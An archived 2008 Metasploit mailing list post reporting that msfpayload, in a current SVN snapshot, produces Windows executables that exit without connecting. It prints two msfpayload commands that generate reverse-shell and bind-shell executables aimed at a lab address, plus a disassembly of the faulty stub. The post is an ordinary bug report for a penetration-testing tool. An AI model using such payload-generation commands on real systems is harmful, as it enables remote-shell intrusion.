Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

possible bug in msfpayload create windows exe in current svn shot

From: security at vahle.de (Thomas Werth)
Date: Tue, 16 Dec 2008 10:05:44 +0100
Hi,

i'm using current svn shot of metasploit. MSFPayload seems to fail in
creating standalone windows executeables.

Example:

bt framework3 # ./msfpayload windows/shell_reverse_tcp LHOST=10.10.10.61
LPORT=4444 X > /root/work/msf_bind_full2_4444.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_reverse_tcp
 Length: 287
Options: LHOST=10.10.10.61,LPORT=4444

bt framework3 # ./msfpayload windows/shell_bind_tcp LHOST=10.10.10.61
LPORT=4444 X > /root/work/msf_bind_full_4444.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell_bind_tcp
 Length: 317
Options: LHOST=10.10.10.61,LPORT=4444


Both commands produce files with identical filesize of 9.728 Bytes. The
Files exit right after start without any attempt to do a network connect
( tested with wireshark).

The disassembling of such a file contains this:

.text:00401000                 public start
.text:00401000 start           proc near
.text:00401000                 xor     eax, eax
.text:00401002                 mov     ecx, offset unk_402000
.text:00401007                 push    offset loc_401030
.text:0040100C                 push    dword ptr fs:[eax]
.text:0040100F                 mov     fs:[eax], esp
.text:00401012                 push    eax
.text:00401013                 push    40h
.text:00401015                 push    2000h
.text:0040101A                 push    ecx
.text:0040101B                 push    ecx
.text:0040101C                 jmp     loc_401040
.text:0040101C ;
---------------------------------------------------------------------------
.text:00401021                 align 10h
.text:00401030
.text:00401030 loc_401030:                             ; DATA XREF:
start+7o
.text:00401030                 jmp     ds:ExitProcess
.text:00401030 ;
---------------------------------------------------------------------------
.text:00401036                 align 10h
.text:00401040
.text:00401040 loc_401040:                             ; CODE XREF:
start+1Cj
.text:00401040                 jmp     ds:VirtualProtect

greets
tom
Previous By Date Next
Previous By Thread Next

Current thread: